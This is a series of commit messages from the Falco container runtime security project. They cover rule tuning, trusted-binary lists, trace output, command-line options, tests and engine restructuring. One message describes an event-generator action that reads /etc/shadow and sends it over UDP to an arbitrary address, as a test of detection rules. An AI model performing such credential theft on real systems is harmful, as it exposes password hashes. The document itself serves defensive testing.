Make sure falco doesn't detect the things draios-agent does as
suspicious. It's possible that you might run open source falco alongside
sysdig cloud.
App checks spawned by sysdig cloud binaries might also change namespace,
so also allow children of sysdigcloud binaries to call setns.
Collect stats on the number of events processed and dropped. When run
with -v, print these stats. This duplicates syddig behavior and can be
useful when dianosing problems related to dropped events throwing off
internal state tracking.
Bring over functionality from sysdig to write trace files. This is easy
as all of the code to actually write the files is in the inspector. This
just handles the -w option and arguments.
This can be useful to write a trace file in parallel with live event
monitoring so you can reproduce it later.
Add a new list k8s_binaries and allow those binaries to do things like
setns/spawn shells. It's not the case that all of these binaries
actually do these things, but keeping it as a single list makes
management easier.
The logic for detecting if a file exists was backwards. It would treat a
file as existing if it could *not* be opened. Reverse that logic so it
works.
This fixes https://github.com/draios/falco/issues/135.
Copy handling of -pk/-pm/-pc/-k/-m arguments from sysdig. All of the
relevant code was already in the inspector so that was easy.
The information from k8s/mesos/containers is used in two ways:
- In rule outputs, if the format string contains %container.info, that
is replaced with the value from -pk/-pm/-pc, if one of those options
was provided. If no option was provided, %container.info is replaced
with a generic %container.name (id=%container.id) instead.
- If the format string does not contain %container.info, and one of
-pk/-pm/-pc was provided, that is added to the end of the formatting
string.
- If -p was specified with a general value (i.e. not
kubernetes/mesos/container), the value is simply added to the end and
any %container.info is replaced with the generic value.
There are a lot of command line options now, so sort them alphabetically
in the usage and getopt handling to make them easier to find.
Also rename -p <pidfile> to -P <pidfile>, thinking ahead to the next
commit.
Add jq to the docker image containing falco. jq is very handy for
transforming json, which comes into play if you want to post to
slack (or other) webhooks.
Add an exfiltration action that reads /etc/shadow and sends the contents
to a arbitrary ip address and port via a udp datagram.
Add the ability to specify actions via the environment instead of the
command line. If actions are specified via the environment, they replace
any actions specified on the command line.
The new privileged falco rule was noisy when running kubernetes, which
can run privileged. Add it to the trusted_containers list.
Also eliminate a couple spurious warnings related to spawning shells in
containers.
New rule 'File Open by Privileged Container' triggers when a container
that is running privileged opens a file.
New rule 'Sensitive Mount by Container' triggers when a container that
has a sensitive mount opens a file. Currently, a sensitive mount is a
mount of /proc.
This depends on https://github.com/draios/sysdig/pull/655.
If a rule has a enabled attribute, and if the value is false, call the
engine's enable_rule() method to disable the rule. Like add_filter,
there's a static method which takes the object as the first argument and
a non-static method that calls the engine.
This fixes#72.
- In the regression tests, make the config file configurable in the
multiplex file via 'conf_file'.
- A new multiplex file item 'outputs' containing a list of <filename>:
<regex> tuples. For each item, the test reads the file and matches
each line against the regex. A match must be found for the test to
pass.
- Add 2 new tests that test file output and program output. They write
to files below /tmp/falco_outputs/ and the contents are checked to
ensure that alerts are written.
The falco engine changes broke the output methods that take
configuration (like the filename for file output, or the program for
program output). Fix that by properly passing the options argument to
each method's output function.
Falco itself spawns a shell when using program notifications, so add
falco to the set of trusted programs. (Also add some other programs like
make, awk, configure, that are run while building).
New variable FALCO_RULES_DEST_FILENAME allows the rules file to be
installed with a different filename. Not set in the falco repo, but in
the agent repo it's installed as falco_rules.default.yaml.
Improve ruleset after using with falco event_generator:
- Instead of assuming all shells are bash, add a list shell_binaries
and macro shell_procs, and replace references to bash with
shell_procs. This revealed some other programs that can spawn shells.
- Add "login" as an interactive command. systemd-login isn't in alpine
linux, which is the linux distro used for the container.
- Move read_sensitive_file_untrusted before
read_sensitive_file_trusted_after_startup, so it can hit first.
C++ program that performs bad activities related to the current falco
ruleset. There are configurable actions for almost all of the current
ruleset, via the --action argument.
By default runs in a loop forever. Can be overridden via --once.
Also add a Dockerfile that compiles event_generator.cpp within an alpine
linux image and copies it to /usr/local/bin. This image has been pushed
to docker hub as "sysdig/falco-event-generator:latest".
Add a Makefile that runs the right docker build command.
Docker 1.12 split docker into docker and dockerd, so add dockerd as a
docker binary. Also be consistent about using docker_binares instead of
just references to docker.
Also add ldconfig as a program that can write to files below /etc.
Add test that cover reading from multiple sets of rule files and
disabling rules. Specific changes:
- Modify falco to allow multiple -r arguments to read from multiple
files.
- In the test multiplex file, add a disabled_rules attribute,
containing a sequence of rules to disable. Result in -D arguments
when running falco.
- In the test multiplex file, 'rules_file' can be a sequence. It
results in multiple -r arguments when running falco.
- In the test multiplex file, 'detect_level' can be a squence of
multiple severity levels. All levels will be checked for in the
output.
- Move all test rules files to a rules subdirectory and all trace files
to a traces subdirectory.
- Add a small trace file for a simple cat of /dev/null. Used by the
new tests.
- Add the following new tests:
- Reading from multiple files, with the first file being
empty. Ensure that the rules from the second file are properly
loaded.
- Reading from multiple files with the last being empty. Ensures
that the empty file doesn't overwrite anything from the first
file.
- Reading from multiple files with varying severity levels for each
rule. Ensures that both files are properly read.
- Disabling rules from a rules file, both with full rule names
and regexes. Will result in not detecting anything.
Add the ability to drop events at the falco engine level in a way that
can scale with the dropping that already occurs at the kernel/inspector
level.
New inline function should_drop_evt() controls whether or not events are
matched against the set of rules, and is controlled by two
values--sampling ratio and sampling multiplier.
Here's how the sampling ratio and multiplier influence whether or not an
event is dropped in should_drop_evt(). The intent is that
m_sampling_ratio is generally changing external to the engine e.g. in
the main inspector class based on how busy the inspector is. A sampling
ratio implies no dropping. Values > 1 imply increasing levels of
dropping. External to the engine, the sampling ratio results in events
being dropped at the kernel/inspector interface. The sampling
multiplier is an amplification to the sampling factor in
m_sampling_ratio. If 0, no additional events are dropped other than
those that might be dropped by the kernel/inspector interface. If 1,
events that make it past the kernel module are subject to an additional
level of dropping at the falco engine, scaling with the sampling ratio
in m_sampling_ratio.
Unlike the dropping that occurs at the kernel level, where the events in
the first part of each second are dropped, this dropping is random.
Move the c++ and lua code implementing falco engine/falco common to its
own directory userspace/engine. It's compiled as a static library
libfalco_engine.a, and has its own CMakeLists.txt so it can be included
by other projects.
The engine's CMakeLists.txt has a add_subdirectory for the falco rules
directory, so including the engine also builds the rules.
The variables you need to set to use the engine's CMakeLists.txt are:
- CMAKE_INSTALL_PREFIX: the root directory below which everything is
installed.
- FALCO_ETC_DIR: where to install the rules file.
- FALCO_SHARE_DIR: where to install lua code, relative to the
- install/package root.
- LUAJIT_INCLUDE: where to find header files for lua.
- FALCO_SINSP_LIBRARY: the library containing sinsp code. It will be
- considered a dependency of the engine.
- LPEG_LIB/LYAML_LIB/LIBYAML_LIB: locations for third-party libraries.
- FALCO_COMPONENT: if set, will be included as a part of any install()
commands.
Instead of specifying /usr/share/falco in config_falco_*.h.in, use
CMAKE_INSTALL_PREFIX and FALCO_SHARE_DIR.
The lua code for the engine has also moved, so the two lua source
directories (userspace/engine/lua and userspace/falco/lua) need to be
available separately via falco_common, so make it an argument to
falco_common::init.
As a part of making it easy to include in another project, also clean up
LPEG build/defs. Modify build-lpeg to add a PREFIX argument to allow for
object files/libraries being in an alternate location, and when building
lpeg, put object files in a build/ subdirectory.